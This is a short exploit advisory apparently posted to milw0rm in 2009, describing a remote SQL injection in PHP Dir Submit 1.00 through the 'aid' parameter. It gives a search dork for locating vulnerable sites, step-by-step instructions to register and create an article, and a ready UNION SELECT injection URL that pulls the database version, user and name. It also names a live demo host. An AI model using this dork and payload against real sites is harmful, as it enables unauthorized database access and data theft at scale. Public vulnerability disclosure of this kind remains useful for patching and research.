45 lines
No EOL
970 B
Text
45 lines
No EOL
970 B
Text
======================================================================
|
|
[»] Script : PHP Dir Submit Version 1.00 (aid) Remote SQL Injection Vuln
|
|
|
|
[»] Language : php
|
|
|
|
[»] Dork : Powered by PHP Dir Submit - Directory Submission Script
|
|
|
|
[»] Script site : http://www.phpdirsubmit.com
|
|
|
|
[»] Founder: Mr.tro0oqy <- from Yemen
|
|
|
|
[»] Gr44tz to: [H]-> borken heart :(
|
|
|
|
[»] E-mail : t.4@windowslive.com
|
|
======================================================================
|
|
exploit:
|
|
--------
|
|
u must be registered in site
|
|
|
|
step1:
|
|
go to :
|
|
-------
|
|
www.xxx.com/path/index.php?menu=signup
|
|
-------
|
|
step2:
|
|
after that :
|
|
-------
|
|
add post from here
|
|
|
|
www.xxx.com/index.php?menu=articles
|
|
-------
|
|
step3:
|
|
press on "View Article"
|
|
and start to inject
|
|
|
|
|
|
http://www.xxx.com/path/index.php?menu=showarticle&aid=3+and+1=0/**/union/**/select/**/1,version(),3,4,user(),database(),7,8,9,10,11--
|
|
|
|
--------
|
|
demo:
|
|
--------
|
|
http://demo.phpdirsubmit.com
|
|
--------
|
|
|
|
# milw0rm.com [2009-08-24] |